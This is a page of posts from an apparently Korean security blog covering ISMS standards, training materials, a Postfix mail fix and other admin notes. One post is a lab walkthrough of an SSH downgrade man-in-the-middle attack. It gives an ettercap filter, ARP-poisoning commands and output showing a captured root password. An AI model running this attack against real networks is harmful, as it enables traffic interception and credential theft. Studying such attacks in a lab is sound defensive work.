보안관리체계/가이드2011. 2. 15. 12:01

정보보호관리체계(ISMS) 구축 및 운영 교육 - 시스템 개발

최근 삼성전자의 협력업체를 대상으로 ISMS 관련 교육이 진행된듯 합니다. << 관련 신문기사 찾기는 어렵네요...
이와 관련하여 KISA에 자료실에 올라온 교육자료를 첨부합니다.

특히 시스템개발과 위험관리 내용이 알차게 기재되어 있으니 관련 업무에 참고하시기 바랍니다.

1.ISMS 인증 개요 및 준비사항.pdf
ISMS구축및운영(시스템개발).part1.rar
ISMS구축및운영(시스템개발).part2.rar

출처 : KISA
저작자표시
Posted by 김주일
어플리케이션/메일보안2011. 2. 15. 11:29

[Postfix] 첨부파일 용량 제한 관련(skipped message, greater than max message size)

Postfix 메일 발송 중 아래의 에러가 발생함.

Feb 15 11:06:53 mail spamc[14183]: skipped message, greater than max message size (512000 bytes)

spamassassin 데몬(spamc)이 용량제한 설정으로 추정됨.

허나 아래와 같이 Postfix 메일 설정(main.cf)을 변경하여 에러를 해결함.

message_size_limit = 41943040

위 용량 크기는 byte 단위로서 포털로 대용량 메일 발송시 반송 메일 내 메일용량크기를 확인하여 설정한 값임.
(40MB)
저작자표시
Posted by 김주일
보안관리체계2011. 2. 8. 23:23

ISO/IEC 27000 가족


 ISO/IEC 27000
(Overview & Vocabulary)


 ISMS 수립 및 인증에 관한 원칙과 용어를 규정하는 표준




 ISO/IEC 27001
(ISMS requirements standard)


 ISMS 수립, 구현, 운영, 모니터링, 검토, 유지 및 개선하기 위한 요구사항을 규정




 ISO/IEC 27002
(code of practice for ISMS)


 ISMS 수립, 구현 및 유지하기 위해 공통적으로 적용할 수 있는 실무적인 지침 및 일반적인 원칙




 ISO/IEC 27003
ISMS Implementation Guide)


 보안범위 및 자산정의, 정책시행, 모니터링과 검토, 지속적인 개선등 ISMS 구현을 위한 프로젝트 수행시 참고할 만한 구체적인 구현 권고사항을 규정한 규격으로, 문서구조를 프로젝트관리 프로세스에 맞춰 작성




 ISO/IEC 27004
(ISM Measurement)


 ISM에 구현된 정보보안통제의 유효성을 측정하기 위한 프로그램과 프로세스를 규정한 규격으로 무엇을, 어떻게, 언제 측정할 것인지를 제시하여 정보보안의 수준을 파악하고 지속적으로 개선시키기 위한문서




 ISO/IEC 27005
(ISM Risk Management)


 위험관리과정을 환경설정, 위험평가, 위험처리, 위험수용, 위험소통, 위험모니터링 및 검토등 6개의프로세스로 구분하고, 각 프로세스별 활동을 input, action, implementation guidance, output으로 구분하여 기술한 문서




 ISO/IEC 27006
(certification or registration process)


 ISMS 인증기관을 인정하기 위한 요구사항을 명시한 표준으로서 인증기관 및 심사인의 자격요건등을 기술




 ISO/IEC 27011
(ISM guideline for telecommunications
organizations)


 통신분야에 특화된 ISM 적용실무 지침으로서 ISO/IEC 27002와 함께적용
(ITU X.1051로알려짐)




 ISO/IEC 27033
(IT network security)


 네트워크시스템의 보안관리와 운영에 대한 실무지침으로 ISO/IEC 27002의 네트워크보안통제를 구현관점에서 기술한 문서




 ISO 27799
(Health Organizations)


 의료정보분야에 특화된 ISMS 적용실무지침으로서 ISO/IEC 27002와 함께적용

출 처 : G-ISMS 안내서

저작자표시
Posted by 김주일
보안관리체계2011. 2. 6. 16:30

정보보호관리체계(ISMS : Information Security Management System) 개요


저작자표시
Posted by 김주일
산업보안2011. 1. 30. 20:29

정보보안컨설턴트 양성과정_중소기업기술정보진흥원

보안컨설턴트과정교재.part1.rar
보안컨설턴트과정교재.part2.rar
보안컨설턴트과정교재.part3.rar
보안컨설턴트과정교재.part4.rar



-보안컨설턴트과정교재
1) 중소기업_정보보안컨설턴트과정_강의교재
2) 박대하_보안컨설턴트교육(추가자료)
3) 오익균_보안컨설턴트교육(추가자료)
4) 장항배_보안컨설턴트교육(추가자료)

링크 : http://www.tpcc.or.kr/board/relatedBoardView.mctp?BOARD_ID=R001&BOARD_SEQ=000000000384&BOARD_GBN=R1&currentPage=1
저작자표시
Posted by 김주일
개인정보보호/가이드2011. 1. 27. 17:33

정보통신서비스제공자를 위한 개인정보보호 가이드

1101_정보통신서비스제공자를_위한_개인정보.pdf


이번에 발간되는 가이드는 “정보통신망의 이용촉진 및 정보보호 등에 관한 법률(이하 정통망법)”에 규정된 개인정보보호 의무 사항을 쉽게 이해할 수 있도록 조항별 제정 취지와 법규 이행방안을 구체적으로 제시하였습니다.

또한, 「개인정보보호 법규 위반에 대한 과징금 부과기준」 및 「개인정보의 기술적·관리적 보호조치 기준」 등 관련 고시의 제·개정에 대한 방통위 최신 심의 의결 내용을 수록하여 정보의 최신성과 활용도를 높였습니다.

링크 : http://privacy.kisa.or.kr/kor/notice/dataView.jsp?p_No=45&b_No=45&d_No=107&cgubun=&cPage=1
저작자표시
Posted by 김주일
네트워크/네트워크보안2011. 1. 27. 09:18

Router Defense

Router Defense deep dives into Cisco routers and switches configuration and do security recommandations. It gives the opportunity to audit network devices in a quick, efficient way and actionable practices. The author created this tool because he was frustrated of never seeing a network device with simple security best practices applied in the wild.

링크 : http://code.google.com/p/routerdefense/
저작자표시
Posted by 김주일
네트워크/네트워크보안2011. 1. 21. 10:11

ssh mith with ettercat

ssh.pcap
mitm.pcap
내용
- 서버와 클라이언트 통신 시 ssh 프로토콜 버전 협상이 발생
(Default : SSH-1.99 >> 2버전)
- MITM을 통해 취약한 버전의 SSH 통신토록 설정

SSH v1 VS SSH v2


0x01. 필터링 규칙 생성
# vi ssh_rb.ef
if ( search(DATA.data, "SSH-1.99"))
{
    replace("SSH-1.99","SSH-1.51");
}
 
# etterfilter -o ssh_rb.ef2 ssh_rb.ef

0x02. MITM 시도
# ettercap -T -q -F ssh_rb.ef2 -M ARP /10.0.0.130/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from ssh_rb.ef2...
Listening on eth0... (Ethernet)

  eth0 ->    00:0C:29:BF:9E:AC        10.0.0.134     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

4 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 10.0.0.130 00:0C:29:42:2A:82

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

SSH : 10.0.0.130:22 -> USER: root  PASS: asdfasdf



참고
- http://superuser.egloos.com/3199639
- http://www.irongeek.com/i.php?page=security/ettercapfilter


저작자표시
Posted by 김주일
보안관리체계2011. 1. 17. 12:23

정보시스템 운영관리 지침

정보시스템 운영관리 지침.pdf

저작자표시
Posted by 김주일
시스템/윈도우일반2011. 1. 11. 11:22

백업한 메일 데이터 복구

메일 복구를 어떻게 할까 고민하던 중 아래의 내용만 보고 계속 삽질했음.


디코딩해서 해당 파일을 저장도 해보고 로컬에서 스크립트 기반의 디코딩 시도를 하였으나 시스템 응답이 없음. ㅜ.ㅜ

허나 한줄기 빛이 보였다.

왜 이런 생각을 해보질 못했을까나... 아쉽네..

현 메일서버(Qmail+Squirrel)데이터의 경우 유닉스 타임이 찍혀서 파일이 생성된다.

요런식으로

1256466024.M376666P13903V000000000000FD00I0018DE8E_0.mail.securitya.kr,S=1519625_2,DS



해당 파일에 확장자(.eml)만 붙여 주면

1256466024.M376666P13903V000000000000FD00I0018DE8E_0.mail.securitya.kr,S=1519625_2,DS.eml



변경된 파일을 더블클릭만으로도 썬더버드에서 편하게 열람할 수 있음


저작자표시
Posted by 김주일

티스토리툴바